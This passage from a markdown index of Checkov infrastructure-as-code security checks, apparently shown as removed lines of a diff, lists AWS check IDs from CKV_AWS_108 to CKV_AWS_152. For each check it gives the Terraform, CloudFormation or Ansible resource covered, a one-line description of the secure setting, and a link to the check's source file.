-|  421 | CKV_AWS_108              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py)                                                                                     |
-|  422 | CKV_AWS_109              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                  |
-|  423 | CKV_AWS_109              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                  |
-|  424 | CKV_AWS_109              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                  |
-|  425 | CKV_AWS_109              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                  |
-|  426 | CKV_AWS_109              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation          | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                                  |
-|  427 | CKV_AWS_109              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)                                                                           |
-|  428 | CKV_AWS_110              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                      |
-|  429 | CKV_AWS_110              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                      |
-|  430 | CKV_AWS_110              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                      |
-|  431 | CKV_AWS_110              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                      |
-|  432 | CKV_AWS_110              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation          | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                      |
-|  433 | CKV_AWS_110              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py)                                                                               |
-|  434 | CKV_AWS_111              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                      |
-|  435 | CKV_AWS_111              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                      |
-|  436 | CKV_AWS_111              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                      |
-|  437 | CKV_AWS_111              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                      |
-|  438 | CKV_AWS_111              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation          | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                      |
-|  439 | CKV_AWS_111              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py)                                                                                               |
-|  440 | CKV_AWS_112              | resource                         | aws_ssm_document                                                                                 | Ensure Session Manager data is encrypted in transit                                                                                                                                                      | Terraform               | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py)                                                 |
-|  441 | CKV_AWS_113              | resource                         | aws_ssm_document                                                                                 | Ensure Session Manager logs are enabled and encrypted                                                                                                                                                    | Terraform               | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py)                                                       |
-|  442 | CKV_AWS_114              | resource                         | aws_emr_cluster                                                                                  | Ensure that EMR clusters with Kerberos have Kerberos Realm set                                                                                                                                           | Terraform               | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py)                                                               |
-|  443 | CKV_AWS_115              | resource                         | AWS::Lambda::Function                                                                            | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation          | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                            |
-|  444 | CKV_AWS_115              | resource                         | AWS::Serverless::Function                                                                        | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation          | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                            |
-|  445 | CKV_AWS_115              | resource                         | aws_lambda_function                                                                              | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Terraform               | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                                 |
-|  446 | CKV_AWS_116              | resource                         | AWS::Lambda::Function                                                                            | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation          | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                            |
-|  447 | CKV_AWS_116              | resource                         | AWS::Serverless::Function                                                                        | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation          | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                            |
-|  448 | CKV_AWS_116              | resource                         | aws_lambda_function                                                                              | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Terraform               | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py)                                                                                 |
-|  449 | CKV_AWS_117              | resource                         | AWS::Lambda::Function                                                                            | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation          | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                            |
-|  450 | CKV_AWS_117              | resource                         | AWS::Serverless::Function                                                                        | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation          | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                            |
-|  451 | CKV_AWS_117              | resource                         | aws_lambda_function                                                                              | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Terraform               | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py)                                                                                                 |
-|  452 | CKV_AWS_118              | resource                         | AWS::RDS::DBInstance                                                                             | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Cloudformation          | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                |
-|  453 | CKV_AWS_118              | resource                         | aws_db_instance                                                                                  | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Terraform               | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                     |
-|  454 | CKV_AWS_118              | resource                         | aws_rds_cluster_instance                                                                         | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Terraform               | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                     |
-|  455 | CKV_AWS_119              | resource                         | AWS::DynamoDB::Table                                                                             | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Cloudformation          | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                    |
-|  456 | CKV_AWS_119              | resource                         | aws_dynamodb_table                                                                               | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Terraform               | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                         |
-|  457 | CKV_AWS_120              | resource                         | AWS::ApiGateway::Stage                                                                           | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation          | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                        |
-|  458 | CKV_AWS_120              | resource                         | AWS::Serverless::Api                                                                             | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation          | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                        |
-|  459 | CKV_AWS_120              | resource                         | aws_api_gateway_stage                                                                            | Ensure API Gateway caching is enabled                                                                                                                                                                    | Terraform               | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py)                                                                             |
-|  460 | CKV_AWS_121              | resource                         | aws_config_configuration_aggregator                                                              | Ensure AWS Config is enabled in all regions                                                                                                                                                              | Terraform               | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py)                                           |
-|  461 | CKV_AWS_122              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance                                                                                                                 | Terraform               | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py)                                                         |
-|  462 | CKV_AWS_123              | resource                         | AWS::EC2::VPCEndpointService                                                                     | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Cloudformation          | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                    |
-|  463 | CKV_AWS_123              | resource                         | aws_vpc_endpoint_service                                                                         | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Terraform               | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                         |
-|  464 | CKV_AWS_124              | resource                         | aws_cloudformation_stack                                                                         | Ensure that CloudFormation stacks are sending event notifications to an SNS topic                                                                                                                        | Terraform               | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py)                                                 |
-|  465 | CKV_AWS_126              | resource                         | aws_instance                                                                                     | Ensure that detailed monitoring is enabled for EC2 instances                                                                                                                                             | Terraform               | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py)                                                               |
-|  466 | CKV_AWS_127              | resource                         | aws_elb                                                                                          | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager                                                                                                           | Terraform               | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py)                                                                                                   |
-|  467 | CKV_AWS_129              | resource                         | aws_db_instance                                                                                  | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled                                                                                                               | Terraform               | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py)                                                                                     |
-|  468 | CKV_AWS_130              | resource                         | aws_subnet                                                                                       | Ensure VPC subnets do not assign public IP by default                                                                                                                                                    | Terraform               | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py)                                                                                           |
-|  469 | CKV_AWS_131              | resource                         | AWS::ElasticLoadBalancingV2::LoadBalancer                                                        | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Cloudformation          | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py)                                                                              |
-|  470 | CKV_AWS_131              | resource                         | aws_alb                                                                                          | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Terraform               | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                   |
-|  471 | CKV_AWS_131              | resource                         | aws_lb                                                                                           | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Terraform               | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                   |
-|  472 | CKV_AWS_133              | resource                         | aws_db_instance                                                                                  | Ensure that RDS instances has backup policy                                                                                                                                                              | Terraform               | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py)                                                         |
-|  473 | CKV_AWS_133              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS instances has backup policy                                                                                                                                                              | Terraform               | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py)                                                         |
-|  474 | CKV_AWS_134              | resource                         | aws_elasticache_cluster                                                                          | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on                                                                                                                            | Terraform               | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py)                                                                 |
-|  475 | CKV_AWS_135              | resource                         | [?"amazon.aws.ec2_instance" != null][]                                                           | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  476 | CKV_AWS_135              | resource                         | [?"ec2_instance" != null][]                                                                      | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  477 | CKV_AWS_135              | resource                         | [].block[?"amazon.aws.ec2_instance" != null][]                                                   | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  478 | CKV_AWS_135              | resource                         | [].block[?"ec2_instance" != null][]                                                              | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  479 | CKV_AWS_135              | resource                         | [].block[].block[?"amazon.aws.ec2_instance" != null][]                                           | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  480 | CKV_AWS_135              | resource                         | [].block[].block[?"ec2_instance" != null][]                                                      | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  481 | CKV_AWS_135              | resource                         | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][]                                   | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  482 | CKV_AWS_135              | resource                         | [].block[].block[].block[?"ec2_instance" != null][]                                              | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  483 | CKV_AWS_135              | resource                         | [].tasks[?"amazon.aws.ec2_instance" != null][]                                                   | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  484 | CKV_AWS_135              | resource                         | [].tasks[?"ec2_instance" != null][]                                                              | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  485 | CKV_AWS_135              | resource                         | [].tasks[].block[?"amazon.aws.ec2_instance" != null][]                                           | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  486 | CKV_AWS_135              | resource                         | [].tasks[].block[?"ec2_instance" != null][]                                                      | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  487 | CKV_AWS_135              | resource                         | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][]                                   | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  488 | CKV_AWS_135              | resource                         | [].tasks[].block[].block[?"ec2_instance" != null][]                                              | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  489 | CKV_AWS_135              | resource                         | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][]                           | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  490 | CKV_AWS_135              | resource                         | [].tasks[].block[].block[].block[?"ec2_instance" != null][]                                      | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Ansible                 | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py)                                                                                               |
-|  491 | CKV_AWS_135              | resource                         | aws_instance                                                                                     | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Terraform               | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py)                                                                                         |
-|  492 | CKV_AWS_136              | resource                         | AWS::ECR::Repository                                                                             | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Cloudformation          | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                      |
-|  493 | CKV_AWS_136              | resource                         | aws_ecr_repository                                                                               | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Terraform               | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                           |
-|  494 | CKV_AWS_137              | resource                         | aws_elasticsearch_domain                                                                         | Ensure that Elasticsearch is configured inside a VPC                                                                                                                                                     | Terraform               | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py)                                                                                   |
-|  495 | CKV_AWS_137              | resource                         | aws_opensearch_domain                                                                            | Ensure that Elasticsearch is configured inside a VPC                                                                                                                                                     | Terraform               | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py)                                                                                   |
-|  496 | CKV_AWS_138              | resource                         | aws_elb                                                                                          | Ensure that ELB is cross-zone-load-balancing enabled                                                                                                                                                     | Terraform               | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py)                                                                                   |
-|  497 | CKV_AWS_139              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS clusters have deletion protection enabled                                                                                                                                                | Terraform               | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py)                                                                             |
-|  498 | CKV_AWS_140              | resource                         | aws_rds_global_cluster                                                                           | Ensure that RDS global clusters are encrypted                                                                                                                                                            | Terraform               | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py)                                                                                 |
-|  499 | CKV_AWS_141              | resource                         | aws_redshift_cluster                                                                             | Ensured that Redshift cluster allowing version upgrade by default                                                                                                                                        | Terraform               | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py)                                                   |
-|  500 | CKV_AWS_142              | resource                         | aws_redshift_cluster                                                                             | Ensure that Redshift cluster is encrypted by KMS                                                                                                                                                         | Terraform               | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py)                                                                             |
-|  501 | CKV_AWS_143              | resource                         | aws_s3_bucket                                                                                    | Ensure that S3 bucket has lock configuration enabled by default                                                                                                                                          | Terraform               | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py)                                                                                   |
-|  502 | CKV_AWS_144              | resource                         | aws_s3_bucket                                                                                    | Ensure that S3 bucket has cross-region replication enabled                                                                                                                                               | Terraform               | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml)                                               |
-|  503 | CKV_AWS_144              | resource                         | aws_s3_bucket_replication_configuration                                                          | Ensure that S3 bucket has cross-region replication enabled                                                                                                                                               | Terraform               | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml)                                               |
-|  504 | CKV_AWS_145              | resource                         | aws_s3_bucket                                                                                    | Ensure that S3 buckets are encrypted with KMS by default                                                                                                                                                 | Terraform               | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml)                                                                 |
-|  505 | CKV_AWS_145              | resource                         | aws_s3_bucket_server_side_encryption_configuration                                               | Ensure that S3 buckets are encrypted with KMS by default                                                                                                                                                 | Terraform               | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml)                                                                 |
-|  506 | CKV_AWS_146              | resource                         | aws_db_cluster_snapshot                                                                          | Ensure that RDS database cluster snapshot is encrypted                                                                                                                                                   | Terraform               | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py)                                                                 |
-|  507 | CKV_AWS_147              | resource                         | aws_codebuild_project                                                                            | Ensure that CodeBuild projects are encrypted using CMK                                                                                                                                                   | Terraform               | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py)                                                                                       |
-|  508 | CKV_AWS_148              | resource                         | aws_default_vpc                                                                                  | Ensure no default VPC is planned to be provisioned                                                                                                                                                       | Terraform               | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py)                                                                                     |
-|  509 | CKV_AWS_149              | resource                         | AWS::SecretsManager::Secret                                                                      | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Cloudformation          | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                          |
-|  510 | CKV_AWS_149              | resource                         | aws_secretsmanager_secret                                                                        | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Terraform               | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                               |
-|  511 | CKV_AWS_150              | resource                         | aws_alb                                                                                          | Ensure that Load Balancer has deletion protection enabled                                                                                                                                                | Terraform               | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py)                                                                               |
-|  512 | CKV_AWS_150              | resource                         | aws_lb                                                                                           | Ensure that Load Balancer has deletion protection enabled                                                                                                                                                | Terraform               | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py)                                                                               |
-|  513 | CKV_AWS_152              | resource                         | aws_alb                                                                                          | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled                                                                                                                        | Terraform               | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py)                                                                                                 |
-|  514 | CKV_AWS_152              | resource                         | aws_lb                                                                                           | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled                                                                                                                        | Terraform               | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py)                                                                                                 |
